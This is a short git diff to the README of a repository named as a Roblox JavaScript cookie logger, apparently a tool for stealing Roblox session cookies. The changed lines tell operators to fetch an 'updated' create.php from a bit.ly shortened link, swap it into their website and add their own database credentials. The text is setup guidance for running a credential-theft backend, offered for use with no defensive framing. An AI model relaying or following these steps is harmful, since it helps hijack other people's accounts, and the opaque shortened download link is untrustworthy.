FLUORESCENTXX/roblox-javascript-cookie-logger/README.md

 # Errors with create.php
-IF YOU HAVE ERRORS I HAVE UPDATED CREATE.PHP HERE https://bit.ly/UPDATEDCreatedotphp
+IF YOU HAVE ERRORS I HAVE UPDATED CREATE.PHP HERE

+https://bit.ly/UPDATEDCreatedotphp

 REPLACE IT IN YOUR WEBSITE!
-IT SHOULD WORK  - 29/01/22
+IT SHOULD WORK  - 29/01/22 Replace with your database info, username, password, etc

 # Preview
 1. Design